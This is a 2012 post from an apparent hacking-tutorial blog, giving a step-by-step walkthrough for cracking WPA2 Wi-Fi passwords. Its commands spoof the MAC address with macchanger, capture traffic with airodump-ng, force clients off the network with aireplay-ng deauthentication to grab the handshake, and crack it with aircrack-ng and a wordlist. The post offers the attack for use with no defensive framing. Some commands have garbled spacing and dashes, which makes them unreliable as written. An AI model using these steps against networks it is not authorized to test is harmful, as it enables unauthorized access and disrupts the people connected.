Friday, 2024-04-26, 6:19 AM
Welcome Guest | RSS
Statistics

Total online: 1
Guests: 1
Users: 0
Site menu
Our Documentations
1* METASPLOIT
Blog Category
# Only for beginners [39]
This category contains some introductions and tutorials about UBUNTU and BACKTRACK for those who just start using LINUX.
# Computer Security [11]
In this category, you will find all courses about the Informatique Security
# LINUX [2]
EVERYTHING ABOUT LINUX - UBUNTU & BACKTRACK - (NEWS, VIDEOS, TUTORIALS, ... )
# BackTrack 5 Tutorials [6]
In this categorie, I will post all tutorials about BackTrack5 (Installation, Configuration, Update, Hacking...)
# TechnicDynamic Tutorials [12]
Technic Dynamic is a source of education focused in the following categories of technology: (Computer - Design - Gadgets - Networking - Security) Link : http://technicdynamic.com
# Vishnuvalentino Tutorials [2]
He is a computer security specialist, and also freelance website designer. Read more : http://vishnuvalentino.com/about/
# Hackers News [6]
All news about the hackers of the world ...
# Tools [18]
All Security Tools
MEMES PICTURES [0]
Entries archive
Shopping


Follow us
facebook
Main » 2012 » March » 22 » [Wireless] Cracking WPA 2 Encrypted Network
8:14 PM
[Wireless] Cracking WPA 2 Encrypted Network

It’s fair to say WPA 2 has done a lot for wireless networks.

It’s made them more secure that’s for sure. However the threat is still out there… Turns out, hacking a WPA 2 encrypted network is pretty similar to cracking a WEP encryption. Let’s see how it’s done… These are the steps:

  • 1. Put wireless interface down, spoof the mac address (optional) and put wireless interface in monitor mode.
    • ifconfig wlan0 down
    • macchanger –mac 00:22:44:66:88:00 wlan0
    • airmon-ng start wlan0
  • 2. Start sniffing the target wireless network on the specific channel, write capture to file.
    • airodump-ng -c 1 –bssid Network MAC Addr. -w Capture Filemon0
  • 3. To capture the WPA handshake, either DeAuthenticate a connected host or wait for one to connect.
    • aireplay-ng -0 0 -a Network MAC Addr. -h Your MAC Addr. -c Client MAC Addr.mon0
  • 4. Now you are ready to crack using the WPA handshake and your wordlist.
    • aircrack-ng –bssid Network MAC Addr. -w WordlistCapture File

Note: Replace the underlined content on your own execution.

For further details, check out the video in high quality:


Song: Scalameriya – Memento Mori

Source : http://technicdynamic.com/2011/12/336/
Category: # TechnicDynamic Tutorials | Views: 1228 | Added by: Administrator | Tags: wireless, Cracking WPA 2 Encrypted Network | Rating: 0.0/0
Total comments: 0
Name *:
Email *:
Code *:
Visitors

Share This On:
Google Translator
Search
Login form
Our poll
Rate my site
Total of answers: 20
Clock & Calendar

«  March 2012  »
SuMoTuWeThFrSa
    123
45678910
11121314151617
18192021222324
25262728293031